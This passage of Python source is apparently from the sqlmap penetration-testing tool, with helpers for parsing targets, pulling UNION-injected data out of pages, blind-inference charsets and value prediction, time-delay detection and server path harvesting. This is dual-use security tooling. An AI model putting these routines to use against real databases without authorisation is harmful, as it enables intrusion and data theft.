if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")):
checkFile(path)
def weAreFrozen():
"""
Returns whether we are frozen via py2exe.
This will affect how we find out where we are located.
Reference: http://www.py2exe.org/index.cgi/WhereAmI
"""
return hasattr(sys, "frozen")
def parseTargetDirect():
"""
Parse target dbms and set some attributes into the configuration singleton.
"""
if not conf.direct:
return
details = None
remote = False
for dbms in SUPPORTED_DBMS:
details = re.search("^(?P<dbms>%s)://(?P<credentials>(?P<user>.+?)\:(?P<pass>.*)\@)?(?P<remote>(?P<hostname>.+?)\:(?P<port>[\d]+)\/)?(?P<db>[\w\d\ \:\.\_\-\/\\\\]+?)$" % dbms, conf.direct, re.I)
if details:
conf.dbms = details.group("dbms")
if details.group('credentials'):
conf.dbmsUser = details.group("user")
conf.dbmsPass = details.group("pass")
else:
if conf.dbmsCred:
conf.dbmsUser, conf.dbmsPass = conf.dbmsCred.split(':')
else:
conf.dbmsUser = unicode()
conf.dbmsPass = unicode()
if not conf.dbmsPass:
conf.dbmsPass = None
if details.group("remote"):
remote = True
conf.hostname = details.group("hostname").strip()
conf.port = int(details.group("port"))
else:
conf.hostname = "localhost"
conf.port = 0
conf.dbmsDb = details.group("db")
conf.parameters[None] = "direct connection"
break
if not details:
errMsg = "invalid target details, valid syntax is for instance "
errMsg += "'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' "
errMsg += "or 'access://DATABASE_FILEPATH'"
raise SqlmapSyntaxException(errMsg)
for dbmsName, data in DBMS_DICT.items():
if conf.dbms in data[0]:
try:
if dbmsName in (DBMS.ACCESS, DBMS.SQLITE, DBMS.FIREBIRD):
if remote:
warnMsg = "direct connection over the network for "
warnMsg += "%s DBMS is not supported" % dbmsName
logger.warn(warnMsg)
conf.hostname = "localhost"
conf.port = 0
elif not remote:
errMsg = "missing remote connection details"
raise SqlmapSyntaxException(errMsg)
if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):
import _mssql
import pymssql
if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2":
errMsg = "'%s' third-party library must be " % data[1]
errMsg += "version >= 1.0.2 to work properly. "
errMsg += "Download from '%s'" % data[2]
raise SqlmapMissingDependence(errMsg)
elif dbmsName == DBMS.MYSQL:
import pymysql
elif dbmsName == DBMS.PGSQL:
import psycopg2
elif dbmsName == DBMS.ORACLE:
import cx_Oracle
elif dbmsName == DBMS.SQLITE:
import sqlite3
elif dbmsName == DBMS.ACCESS:
import pyodbc
elif dbmsName == DBMS.FIREBIRD:
import kinterbasdb
except ImportError:
if _sqlalchemy and data[3] in _sqlalchemy.dialects.__all__:
pass
else:
errMsg = "sqlmap requires '%s' third-party library " % data[1]
errMsg += "in order to directly connect to the database "
errMsg += "%s. You can download it from '%s'" % (dbmsName, data[2])
errMsg += ". Alternative is to use a package 'python-sqlalchemy' "
errMsg += "with support for dialect '%s' installed" % data[3]
raise SqlmapMissingDependence(errMsg)
def parseTargetUrl():
"""
Parse target URL and set some attributes into the configuration singleton.
"""
if not conf.url:
return
originalUrl = conf.url
if re.search("\[.+\]", conf.url) and not socket.has_ipv6:
errMsg = "IPv6 addressing is not supported "
errMsg += "on this platform"
raise SqlmapGenericException(errMsg)
if not re.search("^http[s]*://", conf.url, re.I):
if ":443/" in conf.url:
conf.url = "https://" + conf.url
else:
conf.url = "http://" + conf.url
if CUSTOM_INJECTION_MARK_CHAR in conf.url:
conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
urlSplit = urlparse.urlsplit(conf.url)
hostnamePort = urlSplit.netloc.split(":") if not re.search("\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search("\](:(?P<port>\d+))?", urlSplit.netloc).group("port")))
conf.scheme = urlSplit.scheme.strip().lower() if not conf.forceSSL else "https"
conf.path = urlSplit.path.strip()
conf.hostname = hostnamePort[0].strip()
conf.ipv6 = conf.hostname != conf.hostname.strip("[]")
conf.hostname = conf.hostname.strip("[]").replace(CUSTOM_INJECTION_MARK_CHAR, "")
try:
_ = conf.hostname.encode("idna")
except UnicodeError:
_ = None
if any((_ is None, re.search(r'\s', conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'))):
errMsg = "invalid target URL"
raise SqlmapSyntaxException(errMsg)
if len(hostnamePort) == 2:
try:
conf.port = int(hostnamePort[1])
except:
errMsg = "invalid target URL"
raise SqlmapSyntaxException(errMsg)
elif conf.scheme == "https":
conf.port = 443
else:
conf.port = 80
if urlSplit.query:
conf.parameters[PLACE.GET] = urldecode(urlSplit.query) if urlSplit.query and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in urlSplit.query else urlSplit.query
conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
if not conf.referer and intersect(REFERER_ALIASES, conf.testParameter, True):
debugMsg = "setting the HTTP Referer header to the target URL"
logger.debug(debugMsg)
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders)
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url))
if not conf.host and intersect(HOST_ALIASES, conf.testParameter, True):
debugMsg = "setting the HTTP Host header to the target URL"
logger.debug(debugMsg)
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.HOST, conf.httpHeaders)
conf.httpHeaders.append((HTTP_HEADER.HOST, getHostHeader(conf.url)))
if conf.url != originalUrl:
kb.originalUrls[conf.url] = originalUrl
def expandAsteriskForColumns(expression):
"""
If the user provided an asterisk rather than the column(s)
name, sqlmap will retrieve the columns itself and reprocess
the SQL query string (expression)
"""
asterisk = re.search("^SELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+`?([^`\s()]+)", expression, re.I)
if asterisk:
infoMsg = "you did not provide the fields in your query. "
infoMsg += "sqlmap will retrieve the column names itself"
logger.info(infoMsg)
_ = asterisk.group(2).replace("..", ".").replace(".dbo.", ".")
db, conf.tbl = _.split(".", 1) if '.' in _ else (None, _)
if db is None:
if expression != conf.query:
conf.db = db
else:
expression = re.sub(r"([^\w])%s" % re.escape(conf.tbl), "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
else:
conf.db = db
conf.db = safeSQLIdentificatorNaming(conf.db)
conf.tbl = safeSQLIdentificatorNaming(conf.tbl, True)
columnsDict = conf.dbmsHandler.getColumns(onlyColNames=True)
if columnsDict and conf.db in columnsDict and conf.tbl in columnsDict[conf.db]:
columns = columnsDict[conf.db][conf.tbl].keys()
columns.sort()
columnsStr = ", ".join(column for column in columns)
expression = expression.replace("*", columnsStr, 1)
infoMsg = "the query with expanded column name(s) is: "
infoMsg += "%s" % expression
logger.info(infoMsg)
return expression
def getLimitRange(count, dump=False, plusOne=False):
"""
Returns range of values used in limit/offset constructs
>>> [_ for _ in getLimitRange(10)]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
retVal = None
count = int(count)
limitStart, limitStop = 1, count
if dump:
if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop:
limitStop = conf.limitStop
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
limitStart = conf.limitStart
retVal = xrange(limitStart, limitStop + 1) if plusOne else xrange(limitStart - 1, limitStop)
return retVal
def parseUnionPage(page):
"""
Returns resulting items from UNION query inside provided page content
"""
if page is None:
return None
if re.search("(?si)\A%s.*%s\Z" % (kb.chars.start, kb.chars.stop), page):
if len(page) > LARGE_OUTPUT_THRESHOLD:
warnMsg = "large output detected. This might take a while"
logger.warn(warnMsg)
data = BigArray()
keys = set()
for match in re.finditer("%s(.*?)%s" % (kb.chars.start, kb.chars.stop), page, re.DOTALL | re.IGNORECASE):
entry = match.group(1)
if kb.chars.start in entry:
entry = entry.split(kb.chars.start)[-1]
if kb.unionDuplicates:
key = entry.lower()
if key not in keys:
keys.add(key)
else:
continue
entry = entry.split(kb.chars.delimiter)
if conf.hexConvert:
entry = applyFunctionRecursively(entry, decodeHexValue)
if kb.safeCharEncode:
entry = applyFunctionRecursively(entry, safecharencode)
data.append(entry[0] if len(entry) == 1 else entry)
else:
data = page
if len(data) == 1 and isinstance(data[0], basestring):
data = data[0]
return data
def parseFilePaths(page):
"""
Detects (possible) absolute system paths inside the provided page content
"""
if page:
for regex in (r" in <b>(?P<result>.*?)</b> on line", r"(?:>|\s)(?P<result>[A-Za-z]:[\\/][\w.\\/]*)", r"(?:>|\s)(?P<result>/\w[/\w.]+)"):
for match in re.finditer(regex, page):
absFilePath = match.group("result").strip()
page = page.replace(absFilePath, "")
if isWindowsDriveLetterPath(absFilePath):
absFilePath = posixToNtSlashes(absFilePath)
if absFilePath not in kb.absFilePaths:
kb.absFilePaths.add(absFilePath)
def getLocalIP():
"""
Get local IP address (exposed to the remote/target)
"""
retVal = None
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((conf.hostname, conf.port))
retVal, _ = s.getsockname()
s.close()
except:
debugMsg = "there was an error in opening socket "
debugMsg += "connection toward '%s'" % conf.hostname
logger.debug(debugMsg)
return retVal
def getRemoteIP():
"""
Get remote/target IP address
"""
retVal = None
try:
retVal = socket.gethostbyname(conf.hostname)
except socket.gaierror:
errMsg = "address resolution problem "
errMsg += "occurred for hostname '%s'" % conf.hostname
singleTimeLogMessage(errMsg, logging.ERROR)
return retVal
def getFileType(filePath):
try:
_ = magic.from_file(filePath)
except:
return "unknown"
return "text" if "ASCII" in _ or "text" in _ else "binary"
def getCharset(charsetType=None):
"""
Returns list with integers representing characters of a given
charset type appropriate for inference techniques
>>> getCharset(CHARSET_TYPE.BINARY)
[0, 1, 47, 48, 49]
"""
asciiTbl = []
if charsetType is None:
asciiTbl.extend(xrange(0, 128))
# 0 or 1
elif charsetType == CHARSET_TYPE.BINARY:
asciiTbl.extend([0, 1])
asciiTbl.extend(xrange(47, 50))
# Digits
elif charsetType == CHARSET_TYPE.DIGITS:
asciiTbl.extend([0, 1])
asciiTbl.extend(xrange(47, 58))
# Hexadecimal
elif charsetType == CHARSET_TYPE.HEXADECIMAL:
asciiTbl.extend([0, 1])
asciiTbl.extend(xrange(47, 58))
asciiTbl.extend(xrange(64, 71))
asciiTbl.extend([87, 88]) # X
asciiTbl.extend(xrange(96, 103))
asciiTbl.extend([119, 120]) # x
# Characters
elif charsetType == CHARSET_TYPE.ALPHA:
asciiTbl.extend([0, 1])
asciiTbl.extend(xrange(64, 91))
asciiTbl.extend(xrange(96, 123))
# Characters and digits
elif charsetType == CHARSET_TYPE.ALPHANUM:
asciiTbl.extend([0, 1])
asciiTbl.extend(xrange(47, 58))
asciiTbl.extend(xrange(64, 91))
asciiTbl.extend(xrange(96, 123))
return asciiTbl
def directoryPath(filepath):
"""
Returns directory path for a given filepath
>>> directoryPath('/var/log/apache.log')
'/var/log'
"""
retVal = filepath
if filepath:
retVal = ntpath.dirname(filepath) if isWindowsDriveLetterPath(filepath) else posixpath.dirname(filepath)
return retVal
def normalizePath(filepath):
"""
Returns normalized string representation of a given filepath
>>> normalizePath('//var///log/apache.log')
'//var/log/apache.log'
"""
retVal = filepath
if retVal:
retVal = retVal.strip("\r\n")
retVal = ntpath.normpath(retVal) if isWindowsDriveLetterPath(retVal) else posixpath.normpath(retVal)
return retVal
def safeStringFormat(format_, params):
"""
Avoids problems with inappropriate string format strings
>>> safeStringFormat('foobar%d%s', ('1', 2))
u'foobar12'
"""
if format_.count(PAYLOAD_DELIMITER) == 2:
_ = format_.split(PAYLOAD_DELIMITER)
_[1] = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", _[1])
retVal = PAYLOAD_DELIMITER.join(_)
else:
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", format_)
if isinstance(params, basestring):
retVal = retVal.replace("%s", params, 1)
elif not isListLike(params):
retVal = retVal.replace("%s", str(params), 1)
else:
count, index = 0, 0
if retVal.count("%s") == len(params):
while index != -1:
index = retVal.find("%s")
if index != -1:
retVal = retVal[:index] + getUnicode(params[count]) + retVal[index + 2:]
count += 1
else:
count = 0
while True:
match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
if match:
if count >= len(params):
raise Exception("wrong number of parameters during string formatting")
else:
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1)
count += 1
else:
break
return retVal
def getFilteredPageContent(page, onlyText=True):
"""
Returns filtered page content without script, style and/or comments
or all HTML tags
>>> getFilteredPageContent(u'<html><title>foobar</title><body>test</body></html>')
u'foobar test'
"""
retVal = page
# only if the page's charset has been successfully identified
if isinstance(page, unicode):
retVal = re.sub(r"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), " ", page)
while retVal.find(" ") != -1:
retVal = retVal.replace(" ", " ")
retVal = htmlunescape(retVal.strip())
return retVal
def getPageWordSet(page):
"""
Returns word set used in page content
>>> sorted(getPageWordSet(u'<html><title>foobar</title><body>test</body></html>'))
[u'foobar', u'test']
"""
retVal = set()
# only if the page's charset has been successfully identified
if isinstance(page, unicode):
_ = getFilteredPageContent(page)
retVal = set(re.findall(r"\w+", _))
return retVal
def showStaticWords(firstPage, secondPage):
"""
Prints words appearing in two different response pages
"""
infoMsg = "finding static words in longest matching part of dynamic page content"
logger.info(infoMsg)
firstPage = getFilteredPageContent(firstPage)
secondPage = getFilteredPageContent(secondPage)
infoMsg = "static words: "
if firstPage and secondPage:
match = SequenceMatcher(None, firstPage, secondPage).find_longest_match(0, len(firstPage), 0, len(secondPage))
commonText = firstPage[match[0]:match[0] + match[2]]
commonWords = getPageWordSet(commonText)
else:
commonWords = None
if commonWords:
commonWords = list(commonWords)
commonWords.sort(lambda a, b: cmp(a.lower(), b.lower()))
for word in commonWords:
if len(word) > 2:
infoMsg += "'%s', " % word
infoMsg = infoMsg.rstrip(", ")
else:
infoMsg += "None"
logger.info(infoMsg)
def isWindowsDriveLetterPath(filepath):
"""
Returns True if given filepath starts with a Windows drive letter
>>> isWindowsDriveLetterPath('C:\\boot.ini')
True
>>> isWindowsDriveLetterPath('/var/log/apache.log')
False
"""
return re.search("\A[\w]\:", filepath) is not None
def posixToNtSlashes(filepath):
"""
Replaces all occurances of Posix slashes (/) in provided
filepath with NT ones (\)
>>> posixToNtSlashes('C:/Windows')
'C:\\\\Windows'
"""
return filepath.replace('/', '\\')
def ntToPosixSlashes(filepath):
"""
Replaces all occurances of NT slashes (\) in provided
filepath with Posix ones (/)
>>> ntToPosixSlashes('C:\\Windows')
'C:/Windows'
"""
return filepath.replace('\\', '/')
def isHexEncodedString(subject):
"""
Checks if the provided string is hex encoded
>>> isHexEncodedString('DEADBEEF')
True
>>> isHexEncodedString('test')
False
"""
return re.match(r"\A[0-9a-fA-Fx]+\Z", subject) is not None
@cachedmethod
def getConsoleWidth(default=80):
"""
Returns console width
"""
width = None
if os.getenv("COLUMNS", "").isdigit():
width = int(os.getenv("COLUMNS"))
else:
try:
with open(os.devnull, 'w') as FNULL:
process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL)
stdout, _ = process.communicate()
items = stdout.split()
if len(items) == 2 and items[1].isdigit():
width = int(items[1])
except OSError:
pass
if width is None:
try:
import curses
stdscr = curses.initscr()
_, width = stdscr.getmaxyx()
curses.endwin()
except:
pass
return width or default
def clearConsoleLine(forceOutput=False):
"""
Clears current console line
"""
if getattr(LOGGER_HANDLER, "is_tty", False):
dataToStdout("\r%s\r" % (" " * (getConsoleWidth() - 1)), forceOutput)
kb.prependFlag = False
kb.stickyLevel = None
def parseXmlFile(xmlFile, handler):
"""
Parses XML file by a given handler
"""
with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
parse(stream, handler)
def getSQLSnippet(dbms, sfile, **variables):
"""
Returns content of SQL snippet located inside 'procs/' directory
"""
if sfile.endswith('.sql') and os.path.exists(sfile):
filename = sfile
elif not sfile.endswith('.sql') and os.path.exists("%s.sql" % sfile):
filename = "%s.sql" % sfile
else:
filename = os.path.join(paths.SQLMAP_PROCS_PATH, DBMS_DIRECTORY_DICT[dbms], sfile if sfile.endswith('.sql') else "%s.sql" % sfile)
checkFile(filename)
retVal = readCachedFileContent(filename)
retVal = re.sub(r"#.+", "", retVal)
retVal = re.sub(r"(?s);\s+", "; ", retVal).strip("\r\n")
for _ in variables.keys():
retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)
for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I):
retVal = retVal.replace(_, randomStr())
for _ in re.findall(r"%RANDINT\d+%", retVal, re.I):
retVal = retVal.replace(_, randomInt())
variables = re.findall(r"(?<!\bLIKE ')%(\w+)%", retVal, re.I)
if variables:
errMsg = "unresolved variable%s '%s' in SQL file '%s'" % ("s" if len(variables) > 1 else "", ", ".join(variables), sfile)
logger.error(errMsg)
msg = "do you want to provide the substitution values? [y/N] "
choice = readInput(msg, default="N")
if choice and choice[0].lower() == "y":
for var in variables:
msg = "insert value for variable '%s': " % var
val = readInput(msg)
retVal = retVal.replace(r"%%%s%%" % var, val)
return retVal
def readCachedFileContent(filename, mode='rb'):
"""
Cached reading of file content (avoiding multiple same file reading)
"""
if filename not in kb.cache.content:
with kb.locks.cache:
if filename not in kb.cache.content:
checkFile(filename)
with codecs.open(filename, mode, UNICODE_ENCODING) as f:
kb.cache.content[filename] = f.read()
return kb.cache.content[filename]
def readXmlFile(xmlFile):
"""
Reads XML file content and returns its DOM representation
"""
checkFile(xmlFile)
retVal = minidom.parse(xmlFile).documentElement
return retVal
def stdev(values):
"""
Computes standard deviation of a list of numbers.
Reference: http://www.goldb.org/corestats.html
>>> stdev([0.9, 0.9, 0.9, 1.0, 0.8, 0.9])
0.06324555320336757
"""
if not values or len(values) < 2:
return None
key = (values[0], values[-1], len(values))
if kb.get("cache") and key in kb.cache.stdev:
retVal = kb.cache.stdev[key]
else:
avg = average(values)
_ = reduce(lambda x, y: x + pow((y or 0) - avg, 2), values, 0.0)
retVal = sqrt(_ / (len(values) - 1))
if kb.get("cache"):
kb.cache.stdev[key] = retVal
return retVal
def average(values):
"""
Computes the arithmetic mean of a list of numbers.
>>> average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9])
0.9
"""
return (sum(values) / len(values)) if values else None
def calculateDeltaSeconds(start):
"""
Returns elapsed time from start till now
"""
return time.time() - start
def initCommonOutputs():
"""
Initializes dictionary containing common output values used by "good samaritan" feature
"""
kb.commonOutputs = {}
key = None
with codecs.open(paths.COMMON_OUTPUTS, 'r', UNICODE_ENCODING) as f:
for line in f.readlines(): # xreadlines doesn't return unicode strings when codec.open() is used
if line.find('#') != -1:
line = line[:line.find('#')]
line = line.strip()
if len(line) > 1:
if line.startswith('[') and line.endswith(']'):
key = line[1:-1]
elif key:
if key not in kb.commonOutputs:
kb.commonOutputs[key] = set()
if line not in kb.commonOutputs[key]:
kb.commonOutputs[key].add(line)
def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, unique=False):
"""
Returns newline delimited items contained inside file
"""
retVal = list() if not unique else OrderedDict()
checkFile(filename)
with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used
if commentPrefix:
if line.find(commentPrefix) != -1:
line = line[:line.find(commentPrefix)]
line = line.strip()
if not unicode_:
try:
line = str.encode(line)
except UnicodeDecodeError:
continue
if line:
if lowercase:
line = line.lower()
if unique and line in retVal:
continue
if unique:
retVal[line] = True
else:
retVal.append(line)
return retVal if not unique else retVal.keys()
def goGoodSamaritan(prevValue, originalCharset):
"""
Function for retrieving parameters needed for common prediction (good
samaritan) feature.
prevValue: retrieved query output so far (e.g. 'i').
Returns commonValue if there is a complete single match (in kb.partRun
of txt/common-outputs.txt under kb.partRun) regarding parameter
prevValue. If there is no single value match, but multiple, commonCharset is
returned containing more probable characters (retrieved from matched
values in txt/common-outputs.txt) together with the rest of charset as
otherCharset.
"""
if kb.commonOutputs is None:
initCommonOutputs()
predictionSet = set()
commonValue = None
commonPattern = None
countCommonValue = 0
# If the header (e.g. Databases) we are looking for has common
# outputs defined
if kb.partRun in kb.commonOutputs:
commonPartOutputs = kb.commonOutputs[kb.partRun]
commonPattern = commonFinderOnly(prevValue, commonPartOutputs)
# If the longest common prefix is the same as previous value then
# do not consider it
if commonPattern and commonPattern == prevValue:
commonPattern = None
# For each common output
for item in commonPartOutputs:
# Check if the common output (item) starts with prevValue
# where prevValue is the enumerated character(s) so far
if item.startswith(prevValue):
commonValue = item
countCommonValue += 1
if len(item) > len(prevValue):
char = item[len(prevValue)]
predictionSet.add(char)
# Reset single value if there is more than one possible common
# output
if countCommonValue > 1:
commonValue = None
commonCharset = []
otherCharset = []
# Split the original charset into common chars (commonCharset)
# and other chars (otherCharset)
for ordChar in originalCharset:
if chr(ordChar) not in predictionSet:
otherCharset.append(ordChar)
else:
commonCharset.append(ordChar)
commonCharset.sort()
return commonValue, commonPattern, commonCharset, originalCharset
else:
return None, None, None, originalCharset
def getPartRun(alias=True):
"""
Goes through call stack and finds constructs matching conf.dbmsHandler.*.
Returns it or its alias used in txt/common-outputs.txt
"""
retVal = None
commonPartsDict = optDict["Enumeration"]
try:
stack = [item[4][0] if isinstance(item[4], list) else '' for item in inspect.stack()]
# Goes backwards through the stack to find the conf.dbmsHandler method
# calling this function
for i in xrange(0, len(stack) - 1):
for regex in (r"self\.(get[^(]+)\(\)", r"conf\.dbmsHandler\.([^(]+)\(\)"):
match = re.search(regex, stack[i])
if match:
# This is the calling conf.dbmsHandler or self method
# (e.g. 'getDbms')
retVal = match.groups()[0]
break
if retVal is not None:
break
# Reference: http://coding.derkeiler.com/Archive/Python/comp.lang.python/2004-06/2267.html
except TypeError:
pass
# Return the INI tag to consider for common outputs (e.g. 'Databases')
if alias:
return commonPartsDict[retVal][1] if isinstance(commonPartsDict.get(retVal), tuple) else retVal
else:
return retVal
def getUnicode(value, encoding=None, noneToNull=False):
"""
Return the unicode representation of the supplied value:
>>> getUnicode(u'test')
u'test'
>>> getUnicode('test')
u'test'
>>> getUnicode(1)
u'1'
"""
if noneToNull and value is None:
return NULL
if isListLike(value):
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
return value
if isinstance(value, unicode):
return value
elif isinstance(value, basestring):
while True:
try:
return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
except UnicodeDecodeError, ex:
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
else:
try:
return unicode(value)
except UnicodeDecodeError:
return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances
def longestCommonPrefix(*sequences):
"""
Returns longest common prefix occuring in given sequences
Reference: http://boredzo.org/blog/archives/2007-01-06/longest-common-prefix-in-python-2
>>> longestCommonPrefix('foobar', 'fobar')
'fo'
"""
if len(sequences) == 1:
return sequences[0]
sequences = [pair[1] for pair in sorted((len(fi), fi) for fi in sequences)]
if not sequences:
return None
for i, comparison_ch in enumerate(sequences[0]):
for fi in sequences[1:]:
ch = fi[i]
if ch != comparison_ch:
return fi[:i]
return sequences[0]
def commonFinderOnly(initial, sequence):
return longestCommonPrefix(*filter(lambda x: x.startswith(initial), sequence))
def pushValue(value):
"""
Push value to the stack (thread dependent)
"""
getCurrentThreadData().valueStack.append(copy.deepcopy(value))
def popValue():
"""
Pop value from the stack (thread dependent)
>>> pushValue('foobar')
>>> popValue()
'foobar'
"""
return getCurrentThreadData().valueStack.pop()
def wasLastResponseDBMSError():
"""
Returns True if the last web request resulted in a (recognized) DBMS error page
"""
threadData = getCurrentThreadData()
return threadData.lastErrorPage and threadData.lastErrorPage[0] == threadData.lastRequestUID
def wasLastResponseHTTPError():
"""
Returns True if the last web request resulted in an errornous HTTP code (like 500)
"""
threadData = getCurrentThreadData()
return threadData.lastHTTPError and threadData.lastHTTPError[0] == threadData.lastRequestUID
def wasLastResponseDelayed():
"""
Returns True if the last web request resulted in a time-delay
"""
# 99.9999999997440% of all non time-based SQL injection affected
# response times should be inside +-7*stdev([normal response times])
# Math reference: http://www.answers.com/topic/standard-deviation
deviation = stdev(kb.responseTimes)
threadData = getCurrentThreadData()
if deviation and not conf.direct:
if len(kb.responseTimes) < MIN_TIME_RESPONSES:
warnMsg = "time-based standard deviation method used on a model "
warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES
logger.warn(warnMsg)
lowerStdLimit = average(kb.responseTimes) + TIME_STDEV_COEFF * deviation
retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit))
if not kb.testMode and retVal:
if kb.adjustTimeDelay is None:
msg = "do you want sqlmap to try to optimize value(s) "
msg += "for DBMS delay responses (option '--time-sec')? [Y/n] "
choice = readInput(msg, default='Y')
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if choice.upper() == 'N' else ADJUST_TIME_DELAY.YES
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit)
return retVal
else:
return (threadData.lastQueryDuration - conf.timeSec) >= 0
def adjustTimeDelay(lastQueryDuration, lowerStdLimit):
"""
Provides tip for adjusting time delay in time-based data retrieval
"""
candidate = 1 + int(round(lowerStdLimit))
if candidate:
kb.delayCandidates = [candidate] + kb.delayCandidates[:-1]
if all((x == candidate for x in kb.delayCandidates)) and candidate < conf.timeSec:
conf.timeSec = candidate
infoMsg = "adjusting time delay to "
infoMsg += "%d second%s due to good response times" % (conf.timeSec, 's' if conf.timeSec > 1 else '')
logger.info(infoMsg)
def getLastRequestHTTPError():
"""
Returns last HTTP error code
"""
threadData = getCurrentThreadData()
return threadData.lastHTTPError[1] if threadData.lastHTTPError else None
def extractErrorMessage(page):
"""
Returns reported error message from page if it founds one
>>> extractErrorMessage(u'<html><title>Test</title>\\n<b>Warning</b>: oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated<br><p>Only a test page</p></html>')
u'oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated'
"""
retVal = None
if isinstance(page, basestring):
for regex in ERROR_PARSING_REGEXES:
match = re.search(regex, page, re.DOTALL | re.IGNORECASE)
if match:
retVal = htmlunescape(match.group("result")).replace("<br>", "\n").strip()
break
return retVal
def findMultipartPostBoundary(post):
"""
Finds value for a boundary parameter in given multipart POST body
"""
retVal = None
done = set()
candidates = []
for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""):
_ = match.group(1)
if _ in done:
continue
else:
candidates.append((post.count(_), _))
done.add(_)
if candidates:
candidates.sort(key=lambda _: _[0], reverse=True)
retVal = candidates[0][1]
return retVal
def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, plusspace=True):
"""
URL decodes given value
>>> urldecode('AND%201%3E%282%2B3%29%23', convall=True)
u'AND 1>(2+3)#'
"""
result = value
if value:
try:
# for cases like T%C3%BCrk%C3%A7e
value = str(value)
except ValueError:
pass
finally:
if convall:
result = urllib.unquote_plus(value) if plusspace else urllib.unquote(value)
else:
def _(match):
charset = reduce(lambda x, y: x.replace(y, ""), unsafe, string.printable)
char = chr(ord(match.group(1).decode("hex")))
return char if char in charset else match.group(0)
result = value
if plusspace:
result = result.replace("+", " ") # plus sign has a special meaning in URL encoded data (hence the usage of urllib.unquote_plus in convall case)
result = re.sub("%([0-9a-fA-F]{2})", _, result)
if isinstance(result, str):
result = unicode(result, encoding or UNICODE_ENCODING, "replace")
return result
def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False):
"""
URL encodes given value
>>> urlencode('AND 1>(2+3)#')
'AND%201%3E%282%2B3%29%23'
"""
if conf.get("direct"):
return value
count = 0
result = None if value is None else ""
if value:
if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value):
warnMsg = "if you experience problems with "
warnMsg += "non-ASCII identifier names "
warnMsg += "you are advised to rerun with '--tamper=charunicodeencode'"
singleTimeWarnMessage(warnMsg)
if convall or safe is None:
safe = ""
# corner case when character % really needs to be
# encoded (when not representing URL encoded char)
# except in cases when tampering scripts are used
if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions:
value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value)
while True:
result = urllib.quote(utf8encode(value), safe)
if limit and len(result) > URLENCODE_CHAR_LIMIT:
if count >= len(URLENCODE_FAILSAFE_CHARS):
break
while count < len(URLENCODE_FAILSAFE_CHARS):
safe += URLENCODE_FAILSAFE_CHARS[count]
count += 1
if safe[-1] in value:
break
else:
break
if spaceplus:
result = result.replace(urllib.quote(' '), '+')
return result
def runningAsAdmin():
"""
Returns True if the current process is run under admin privileges
"""
isAdmin = None
if PLATFORM in ("posix", "mac"):
_ = os.geteuid()
isAdmin = isinstance(_, (int, float, long)) and _ == 0
elif IS_WIN:
import ctypes
_ = ctypes.windll.shell32.IsUserAnAdmin()
isAdmin = isinstance(_, (int, float, long)) and _ == 1
else:
errMsg = "sqlmap is not able to check if you are running it "
errMsg += "as an administrator account on this platform. "
errMsg += "sqlmap will assume that you are an administrator "
errMsg += "which is mandatory for the requested takeover attack "
errMsg += "to work properly"
logger.error(errMsg)
isAdmin = True
return isAdmin
def logHTTPTraffic(requestLogMsg, responseLogMsg):
